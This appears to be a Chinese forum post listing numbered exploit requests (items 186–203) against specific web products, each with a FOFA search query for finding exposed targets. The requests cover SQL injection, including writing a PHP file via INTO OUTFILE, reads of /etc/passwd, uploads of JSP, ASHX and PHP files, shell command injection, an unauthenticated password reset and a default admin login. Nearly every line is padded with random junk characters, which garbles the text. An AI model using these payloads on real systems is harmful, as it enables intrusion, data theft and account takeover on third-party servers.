2 D3 L3 z6 O$ `+ `FOFA:app="REALOR-天翼应用虚拟化系统"
- _! `9 x/ Z# vGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
- q" t2 Z7 f0 O8 s, z5 y: ?Host: host3 M# v" i3 {+ u* K3 g
6 r2 `( c% u) d& d+ n0 F. O3 Z4 _
7 X6 H. m5 @9 T: B4 Q186. F-logic DataCube3 SQL注入
( d6 j# x7 Y1 V( t: C4 JCVE-2024-31750% E) ?: q p4 v, {5 m
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
, h& T# T, I% h% S' p/ A1 YFOFA:title=="DataCube3": Z, P2 j2 A$ T
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1* Z& C: o2 M' ]7 t1 q: t2 P! t
Host: your-ip6 D- N: q% g" H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.09 g$ o2 t* z% b5 D( O. W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
' ^5 P( j2 y% pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! T. }: a; X# {- HAccept-Encoding: gzip, deflate7 z. T, D+ u2 A* Y8 F8 i6 U# w
Connection: close
/ D) _6 b2 O* i# m2 h: vContent-Type: application/x-www-form-urlencoded4 y+ t7 @ l8 D# P
. \: [0 E" `6 P% D, Hreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
6 T( U1 B7 |" P$ E4 A, \5 g9 M O/ U/ ^. L5 V& L! ]( _
1 i! Q8 B l. N- _' ]" V) @
187. Mura CMS processAsyncObject SQL注入2 H# }( E# I1 L
CVE-2024-32640: L8 d, f- t# d/ {$ ]
FOFA:"Mura CMS"& ^9 a! H8 `7 t$ G' K3 d! D7 \4 H
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" G @0 `7 y+ @1 Z
Host: your-ip" l! i8 a, P( U. y- D
Content-Type: application/x-www-form-urlencoded7 @$ M2 S# e4 Q% u/ E: S+ }. B
/ I2 h" d. i. j5 C
- G2 q7 ^+ o1 s& R
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=11 _" k& H: a2 d: X0 |8 C0 O
9 K2 E5 h% Q- @7 Z( ?0 x( p; {, g- k1 } E) b9 L* z
188. 叁体-佳会视频会议 attachment 任意文件读取5 H" f( a$ q: P( [9 j! e6 a4 S$ ]
version <= 3.9.7
8 X0 d) u: |8 X5 m3 B5 ]0 IFOFA:body="/system/get_rtc_user_defined_info?site_id"- a/ g$ M& f6 p) ~" g3 Q* o6 Q5 l
GET /attachment?file=/etc/passwd HTTP/1.1, n9 A) S0 {: t+ i% R3 o
Host: your-ip
) o, M9 o- s, n: e+ o( |5 b+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, f5 h1 D% N) u1 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( ~* V4 z. E0 {9 vAccept-Encoding: gzip, deflate4 \' s* _' c6 l
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
: [* A3 y& u1 \Connection: close
1 B7 R7 Q% i' O( U+ K
- L" B) q+ U( D/ k: ?
: `0 J8 v8 t+ ]/ Y/ e189. 蓝网科技临床浏览系统 deleteStudy SQL注入# z/ l- F* |, O% s( i8 W
FOFA:app="LANWON-临床浏览系统"/ ^" c. L/ E- a3 D* m8 g# S
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
; Y9 K. X3 t6 VHost: your-ip# i# Z9 \9 @) W! Y- z. ], g; u( ~/ z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! l# j$ i" g! M! ^( J+ }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 e+ V2 I! |" ]7 W% a" m9 sAccept-Encoding: gzip, deflate
& }) `$ Q/ D$ ^& J3 X0 l D e0 BAccept-Language: zh-CN,zh;q=0.9' Z5 O/ d0 k0 w; V
Connection: close
" e3 A ]( B0 j. S1 y8 ]: V
; ]0 K4 o8 f" J# t% `9 h. L5 ?" H$ O. t
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
S1 b/ l3 D% Y0 gFOFA:title=="短视频矩阵营销系统"
; [. s, a( W1 V+ rPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
9 _/ F# Z. h3 M5 KHost: your-ip6 Z1 g- L9 I" f) M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
0 b6 Z& h: R! I# IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! M9 o; I1 G5 G# FContent-Type: application/x-www-form-urlencoded7 T1 ?1 h ~1 A" t1 J
Accept-Encoding: gzip, deflate. J1 g5 k+ t! }. x4 J% E2 u, q
Accept-Language: zh-CN,zh;q=0.9& X' s% m q6 D8 z# c: p
! L) ^$ u& E+ _6 Z; r- @4 q, opoi=file:///etc/passwd
. v2 e9 X6 J' _$ \- l- g1 F
9 K/ Q! R3 Z* l$ i$ h- M# L& @' x$ [6 Y" r3 f5 S' e+ w
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入3 u- ?6 \2 c) M6 @4 A
FOFA:body="/CDGServer3/index.jsp"
& w5 e. _( X8 H. h% DPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
, A" v: y; ?( G# n* w) r6 WHost: your-ip
9 y, X3 T+ ?. H% P! L+ @& NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: T! {) r! l5 @, n1 Q) S" ?Content-Type: application/x-www-form-urlencoded( ~0 O2 y* P, ^" v
) K+ k# r1 k# P
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=, P) ]; m! \2 j+ n+ t8 F: ~
" S* O+ s+ c+ x2 ?1 M, Y% {$ [, ]
4 T- v" A9 j* z8 v1 Q2 g% c192. 富通天下外贸ERP UploadEmailAttr 任意文件上传0 ^* ?* A1 b2 L
FOFA:title="用户登录_富通天下外贸ERP"' c/ O9 ?) M& ?/ n% @
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
. p& p+ N1 }+ P: a& xHost: your-ip, h0 W, U0 E: u# Q0 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" S) Z/ C- }) W# H
Content-Type: application/x-www-form-urlencoded
/ G/ i" G$ K) P; d' `$ [
8 D9 X) e5 _/ n& E+ s2 Y y; n- d9 c; C
<% @ webhandler language="C#" class="AverageHandler" %>
6 G3 [" l: @0 g1 K9 s, M" S; husing System;3 F' c n& U; E
using System.Web;1 h( ^, E4 q( K% U- `
public class AverageHandler : IHttpHandler: j- C- i* ~8 d" n8 f$ i" T' P
{
* c, t' Z* K- m! \/ bpublic bool IsReusable- c" e, b; y3 D! X; h4 H
{ get { return true; } }4 U j) O- o4 R. N+ b
public void ProcessRequest(HttpContext ctx)+ |& Z4 Z8 V' T- u' g4 \
{
: L+ ^+ B1 F% @0 q0 rctx.Response.Write("test");5 [: z$ Z* v2 ~+ W; K* m
}
- E* e" ]% H- O* w3 z}
9 F) a1 Z9 ?' r' V+ b; j% Z4 |" |5 s1 O
* |: }7 b4 {! r* g3 F3 f6 n& p: B193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
. z& P: O" T( ^0 G1 y! yFOFA:body="山石云鉴主机安全管理系统"% m9 O5 [3 I) J7 _# ?+ h
GET /master/ajaxActions/getTokenAction.php HTTP/1.18 |! D- E' |6 `! |6 Z
Host:, t7 P$ E" M5 a. a1 @) _
Cookie: PHPSESSID=2333333333333;6 ]8 a5 M- }- v$ B/ d
Content-Type: application/x-www-form-urlencoded/ M2 |, x# {/ w) T
User-Agent: Mozilla/5.0' h+ j, G/ p3 h! m
( y+ ~& a9 }' `7 R% v" O% {
) o2 R! N4 C+ Z2 c9 {
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1" Z" D6 E! ^2 |9 o7 b G) R
Host:
! u+ A+ P$ _& q2 s! C# gUser-Agent: Mozilla/5.0
& _8 X3 ^3 j3 {% TAccept-Encoding: gzip, deflate
+ C7 H' `2 @ e8 R4 p7 qAccept: */*) R2 W: }# L- ]* E
Connection: close$ g! y7 a% J7 L& a
Cookie: PHPSESSID=2333333333333;
) O% N3 i" B8 q8 SContent-Type: application/x-www-form-urlencoded
' ?- I1 x% s7 x E3 YContent-Length: 84
+ O U4 \+ O* v4 y; Q5 J5 m) N6 ]$ K2 a2 c0 j% A( x
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')7 D% x; _( s5 i7 b6 `
; y( d8 E+ T m9 }$ f2 ?/ Y
S+ O9 v( v" \4 m4 GGET /master/img/config HTTP/1.1
1 k$ y7 ^8 v" K. C1 F1 h; aHost:
4 e9 t& v; A! L: `( `' }; ~User-Agent: Mozilla/5.03 U3 x' o! V3 k4 I; d N! W( B4 g
8 T: d* f- }( n
* @* v/ Y- x( k7 G5 Q/ }6 A8 T5 I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% B) d/ r0 l+ N
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在, k+ W6 Y8 t3 @" h. h
7 o+ p. O& ?2 z
POST /servlet/uploadAttachmentServlet HTTP/1.1+ b4 t! F3 L% @& ?
Host: host
& g' w7 M! w7 H/ [7 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
1 [; v( [, B5 u( IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 E! Y; b3 m. u) W5 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: S6 a) i/ U/ w2 kAccept-Encoding: gzip, deflate- n, f" \* P1 c& E( X1 c. ], f
Connection: close2 x0 U- R6 B) _/ _4 C2 \1 k- l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk: M! h0 h1 Z% a, J) |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: G* }; z' l- q4 H# D1 o. o. T9 J. Z) o# [
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
) v2 f( F( i4 B, K$ MContent-Type: text/plain0 l5 S+ k2 T; T: y4 D! t4 w7 F
<% out.println("hello");%>
" C+ T) L% |" l! \------WebKitFormBoundaryKNt0t4vBe8cX9rZk
. ^& t1 I5 g# V$ B& n" U0 S, k5 l, gContent-Disposition: form-data; name="json"5 v J0 A$ M* ~/ [( M6 S
{"iq":{"query":{"UpdateType":"mail"}}}! c# K- x; U5 M6 q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
3 V3 ^. j" |5 r8 @- r6 f; q5 ^ j% h7 J& k
. V0 I7 ]* b, _3 w% u h: Z195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
$ b' P; j ^. j. r5 {FOFA:title=="飞鱼星企业级智能上网行为管理系统
6 V9 F9 U) c7 t. ?$ iPOST /send_order.cgi?parameter=operation HTTP/1.1
, `6 q& Y& ?/ q4 H( R8 M0 yHost: 127.0.0.1
% L# L8 w s$ APragma: no-cache9 P( |2 v( o( {- n3 k$ M+ o* U' s
Cache-Control: no-cache$ g" L! l# ^- t' x: {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- A& i, m# D8 R1 f
Accept: */*
3 R8 X' N# \& Z& k2 n- oAccept-Encoding: gzip, deflate9 c* l* }! C1 n6 ]2 K
Accept-Language: zh-CN,zh;q=0.9
) S) g1 Q9 K: `; `' GConnection: close8 X; y% S6 Z( W1 E6 H8 g
Content-Type: application/x-www-form-urlencoded( `/ V# t3 r; |
Content-Length: 68( o8 e& A L9 N
: S! n: ?1 y# l W
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
9 ?# X# ^" A' n9 L$ F. J( @ w# L8 \# a( x
" T* [1 P6 N& i1 z
196. 河南省风速科技统一认证平台密码重置
' [3 |4 r- a9 Q4 J* _* B1 W6 T6 ]# RFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
5 l! ?" H, u" e( e9 y3 n$ ~4 b& _POST /cas/userCtl/resetPasswordBySuper HTTP/1.17 \) d6 r' S) e' Q! c- O; s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ X3 t# O; g- sContent-Type: application/json;charset=UTF-8* N+ w% ?- q0 X# n0 V+ ] G
X-Requested-With: XMLHttpRequest! B% L& D: Q; Q! p' O
Host:$ N3 b+ q- ]5 @8 d5 g
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.23 D% r. c* r" ~+ p# U/ S
Content-Length: 45
; ~/ }( z/ i+ m% [/ b% x) C+ UConnection: close
; B' X y3 U+ M( Z w
/ M# s2 j6 ^/ i( [& K3 `5 f{"xgh":"test","newPass":"test666","email":""}
& C: U% Z g: G: X* f/ f/ x( }* @' W6 F% ~7 z6 p n
& Q/ {, Y' g% J
$ [+ _$ y" R; l3 S+ K+ [
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
: T0 s/ Q8 u0 \2 q5 C, CFOFA:app="浙大恩特客户资源管理系统"/ x% O9 t2 w6 g/ V
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
- ^# K7 s5 Z0 Q% vHost:
- U M' I) F2 _( Y( gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
# i9 W; e) h3 O F( l* IAccept-Encoding: gzip, deflate
8 n: \2 G7 h, l% z5 X A5 V: JConnection: close
% q+ ~* N( [. I/ U$ F
5 {' T+ f3 y# Q1 p& A% f. G
% \ M r$ I- a3 F6 a( I/ _9 d' F0 P8 P+ B2 s
198. 阿里云盘 WebDAV 命令注入
9 D2 O5 d9 V4 v. H4 h/ @CVE-2024-296401 n8 r5 |) ]0 l! p, y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
6 X# V' y5 V- h7 t5 Y9 d& C: w' n( mCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
+ u d' s0 F" m$ I% @: b tAccept: */*( t! x' V( {! s9 z; [' s4 _+ t
Accept-Encoding: gzip, deflate
8 p+ L8 ]+ t4 p8 j' ^: I3 l2 I" YAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
) x1 A5 o8 T. X, c2 e GConnection: close/ A3 a& r2 T) ~0 X3 ^# o
1 \/ F9 Z- [; y% Z0 v* x" n2 \, F
! {$ C* e+ h+ R. k+ D. e
199. cockpit系统assetsmanager_upload接口 文件上传/ B) F" ?! y) N$ ]
% D) ~) C/ n. W9 i4 k" a1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
3 @3 o8 ]. n' u) @$ hGET /auth/login?to=/ HTTP/1.1
& e0 D0 S( D. J8 E. ^ w) \( V+ \* O& z! E) \# c% @9 g) _) y* @
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
M# }2 v$ ~% K: C3 a$ J% u# f# j( n/ }9 i# a; ^' W
2.使用刚才上一步获取到的jwt获取cookie:9 U) C5 q9 f; l' u
4 a1 Q, G0 o8 j! R9 O) i1 |
POST /auth/check HTTP/1.12 j, _1 _. t4 X; ]
Content-Type: application/json
* A8 m- q, L$ ~9 N( h: h" @$ ~: V0 `- d0 L1 B" s" H- a. m
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
8 d/ C% O' W* K) b0 w6 S/ ^2 v d6 |4 O% G9 I
响应:200,返回值:: v" w: M0 f! o* R% ]$ q" E
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# E% ~7 @5 r( D, j ?# P
Fofa:title="Authenticate Please!"" m* M( p$ }: T1 Z
POST /assetsmanager/upload HTTP/1.1, J6 V+ ?8 L! P; ^- j* C: i9 ?6 Y0 ~
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( @1 U, Y! `, H% [7 s2 T1 SCookie: mysession=95524f01e238bf51bb60d77ede3bea92" M+ F/ n' g6 x5 Q
# J; n% M5 ]0 l-----------------------------36D28FBc36bd6feE7Fb33 `5 Q; }8 H( h0 c3 ^
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
9 A. M1 b( b4 Q# T( mContent-Type: text/php# O+ c8 M& M- _8 ^$ u
" @6 ?# ?2 ?2 E! o
<?php echo "tttt";unlink(__FILE__);?>
( g! i- k2 C; }/ o) e/ E* L* G, p' W-----------------------------36D28FBc36bd6feE7Fb3; k, [! C5 c9 D) i2 Q* E
Content-Disposition: form-data; name="folder"
1 T2 C" j L' f; T' C5 A
- Y2 b5 o6 ^ O) v9 p9 e-----------------------------36D28FBc36bd6feE7Fb3--
* O5 Y# q, X4 _ s
0 s$ V9 x3 K" S |) G9 C8 Z. ^) g- p r6 Y6 X b
/storage/uploads/tttt.php
0 t8 `6 ?3 O6 H0 N7 b3 w+ G5 V3 A& V# \4 b$ o/ o! g
200. SeaCMS海洋影视管理系统dmku SQL注入5 f# q8 ]5 e( L: l9 g" y6 v' ~
FOFA:app="海洋CMS"- q0 Y3 U) Q) ^9 |2 V2 k5 B
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
3 H$ R+ Z( k# u3 C0 I1 RCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
, N$ b0 x7 e0 w8 q+ MUpgrade-Insecure-Requests: 1
6 `" {* S1 v) d/ ~* {Cache-Control: max-age=07 f% X$ @' K7 T8 G( {& Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( g& q1 }9 M/ v5 x; z# @- V
Accept-Encoding: gzip, deflate
; J4 l( b' d* I# qAccept-Language: zh-CN,zh;q=0.9
$ N) e4 \! A: Z/ _) w4 S5 A: ^. O( s d+ K0 u" H
3 h0 [. C2 q8 y \201. 方正全媒体新闻采编系统 binary SQL注入
& v6 z1 h+ ], LFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统" D9 x5 N; X. @. S6 m
POST /newsedit/newsplan/task/binary.do HTTP/1.1! \$ V# I v! Q' l3 Z9 \; g
Content-Type: application/x-www-form-urlencoded
5 {* S" Z& n# o/ |& ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% ^4 R5 E1 r! t7 aAccept-Encoding: gzip, deflate; k9 M* p8 m. h; G4 a9 p
Accept-Language: zh-CN,zh;q=0.98 N$ m7 M- J5 G+ j W2 z
Connection: close" c7 d5 z+ ^- `" K* y2 ]( a
9 p5 h& x! f/ m/ M4 _4 [5 R1 Z
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
: x5 w# e6 t; \2 y
& i7 M5 d3 n# x
X& L! L5 F7 e: ^9 u' N202. 微擎系统 AccountEdit任意文件上传
8 f: O' I/ ?9 lFOFA:body="/Widgets/WidgetCollection/"- \' r+ N; @# n8 [1 u
获取__VIEWSTATE和__EVENTVALIDATION值
$ e% C# R+ k" y# E* lGET /User/AccountEdit.aspx HTTP/1.1
4 f2 ~( r' k5 o/ C; t+ pHost: 滑板人之家
& e( Z& n: P; ?6 V. ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31& n a7 U r5 L
Content-Length: 0
8 J# \ \7 O9 Q; Y, U# ^6 A5 a: X; k; y6 A" J2 ~6 O$ N
: u( _8 z- _1 `0 ^& g: j
替换__VIEWSTATE和__EVENTVALIDATION值! w4 c; v/ z5 A4 V% x, ~7 N
POST /User/AccountEdit.aspx HTTP/1.1
b+ \* t' w* I7 F5 l( U9 \5 ~Accept-Encoding: gzip, deflate, br
9 Z" |- N9 A# B6 d$ VContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687) u4 e. B) D4 ^6 @) L* |
! ~* C% g( Z4 `, C+ l1 G-----------------------------786435874t38587593865736587346567358735687( y% x3 f5 E9 Q G; h
Content-Disposition: form-data; name="__VIEWSTATE"$ i( M* z4 G# E) o) z1 r* U9 O
) {3 I5 P5 L; |# Y__VIEWSTATE
5 H8 t+ L+ f- c: ^7 g4 T7 s-----------------------------786435874t38587593865736587346567358735687
3 A- r( i1 z1 i1 ZContent-Disposition: form-data; name="__EVENTVALIDATION"$ n# \& n: f/ `% r, a! e' ^ ~
* N4 k; L8 r- Z3 Q! G7 p2 h+ G__EVENTVALIDATION
% l4 k0 u- ~4 b+ f H-----------------------------786435874t38587593865736587346567358735687
8 | x2 M; J5 a5 GContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt": A$ V' d u. i [! Y7 P% X8 S% v- n
Content-Type: text/plain
, @# G2 K+ S. J9 R7 Q9 ?2 b
5 A$ }- B; d# c/ WHello World!6 X0 q z- Z/ s, T# z D
-----------------------------786435874t38587593865736587346567358735687
2 {8 H7 f9 K2 ^6 oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"6 P9 Q$ a. B4 k8 @: K+ o
; k2 Y: T3 |( \" y( a上传图片
4 Z; N6 L* b; H5 y1 Y-----------------------------786435874t385875938657365873465673587356874 U# ]/ B, l8 p) P3 T# P% u
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
I5 ~! d9 d9 d- R
4 m9 g2 l# M9 `0 j( L6 s! X
2 T' L2 }, j/ a" d: ~-----------------------------786435874t38587593865736587346567358735687
5 M, Z7 J* X8 F# [5 vContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
1 B, ~9 ?9 T& L
- \6 Y& W9 n0 i; \; \8 e1 `8 u* O. H4 G- _0 Z1 d+ |; h- Y
-----------------------------786435874t38587593865736587346567358735687--- X$ k5 t' l" M1 N; l
8 ^) c' O8 `2 K# x" U$ x: P9 }' z1 `; k q# @2 L
/_data/Uploads/1123.txt
0 b3 @$ t$ @! `" m) K
. m- H- A# H6 q4 L203. 红海云EHR PtFjk 文件上传
, R0 f2 k/ A( SFOFA:body="RedseaPlatform"
: @+ U5 }% l. x( J% \. qPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1! m( Z7 S8 T. q2 e2 z, Q
Host: x.x.x.x3 W# M+ m* C# d3 Y8 _5 r) f4 r
Accept-Encoding: gzip
# H$ W3 q+ n# w3 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! P* S4 V7 x. d: k s' sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
1 n; ]) L7 e" [$ k- H5 E" I" s" x+ N- LContent-Length: 210
2 `6 `4 y6 C+ N5 z3 ~7 H/ n v1 P
1 Q8 M. [3 Y# K: D7 b8 M" q) _4 @------WebKitFormBoundaryt7WbDl1tXogoZys4# q2 x; l0 ^# a2 x* g
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"9 A6 C# E( i. O3 c% K8 h' D4 f- Q
Content-Type:image/jpeg: d& p, ^- ^$ |( j9 H0 l' C/ ?
1 @/ r1 t( Y. o1 N<% out.print("hello,eHR");%>
1 F" c! @1 u% V/ P------WebKitFormBoundaryt7WbDl1tXogoZys4--
% V0 z/ ~/ Y) e* Z6 _7 M# n
+ \8 b; e, e- \: `
# t6 R5 C# G6 Z5 d4 f+ }- { o9 f) Q; t8 {/ l4 f
1 M/ u2 U1 N$ x0 a; @
0 m* _4 L$ u: Q+ |/ h- t
. s) Q* M$ b' w- z4 X |
发表于 2024-6-5 14:31:29
收藏
支持
反对